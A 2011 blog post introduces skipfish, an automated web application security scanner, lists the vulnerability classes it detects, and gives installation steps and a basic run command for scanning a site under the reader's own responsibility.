skipfish: Web Security Reconnaissance Tool
http://bechtsoudis.com/2011/04/05/skipfish-web-security-reconnaissance-tool/ | Tue, 05 Apr 2011 01:05:13 +0000

Skipfish is a fully automated, active web application security reconnaissance tool released by Michal Zalewski (lcamtuf). Web developers and security professionals can use skipfish to run a series of tests against websites under their responsibility. Skipfish supports Linux, FreeBSD, Mac OS X and Windows (Cygwin) environments (I did my tests on a Debian distribution). The tool has been released to the public by Google in order to offer an easy-to-use, high-speed solution for making websites safer.

Skipfish classifies the discovered risks as high, medium and low. Some of the higher risk ones include:

  • Server-side SQL injection (including blind vectors, numerical parameters).
  • Explicit SQL-like syntax in GET or POST parameters.
  • Server-side shell command injection (including blind vectors).
  • Server-side XML / XPath injection (including blind vectors).
  • Format string vulnerabilities.
  • Integer overflow vulnerabilities.

Skipfish isn't the only available solution; there are many free and commercial web vulnerability scanners (like Nikto2 and Nessus), which sometimes produce better analysis results. In any case, it's about time people started taking security seriously, and using a tool like this is a good first step in the right direction.

Let’s proceed to the installation steps:

  1. Download skipfish from the official site.
  2. Check downloaded sha1sum with the one from the official site.
    $sha1sum skipfish-1.x.tgz
  3. Ensure that your system meets the requirements (if not, install the required packages through your OS package manager):
    • libidn11
    • libidn11-dev
    • libssl-dev
    • zlib1g-dev
    • gcc
    • make
    • libc6
    • libc6-dev
  4. Extract files.
  5. Run make to compile the sources. In case of problems, read the known issues wiki.

After compilation has finished, you are strongly advised to read the README-FIRST file in order to choose the appropriate type of dictionary. As a start, if your web application is small, you can use the complete.wl dictionary.

 

Let’s proceed to the running part.

  1. In the skipfish main directory, make a copy of the complete dictionary:
     $cp dictionaries/complete.wl skipfish.wl
  2. Create a directory for the output reports.
  3. Execute skipfish, giving the website URL:
     $./skipfish -o outputresults http://example.com
  4. Hit a key to start the scan.
  5. Wait for the scan to finish. If you terminate the scanning process early, you can still see the risks reported so far.
  6. Open the index.html report with Firefox.

You should then be able to interpret the results easily; most of the scan results are pretty self-explanatory. It is recommended to pay attention first to the high-risk vulnerabilities detected by the scan. You can expand those results to read more details.

What to do next? You need to educate yourself in understanding and correcting these vulnerabilities. For example, if skipfish reports SQL injection vulnerabilities on your website, you might need to read and learn more about SQL injection. You can use Google to find more details about each vulnerability.

 

Here are some screenshots from the tool:

 

Useful links:

 

 

A. Bechtsoudis
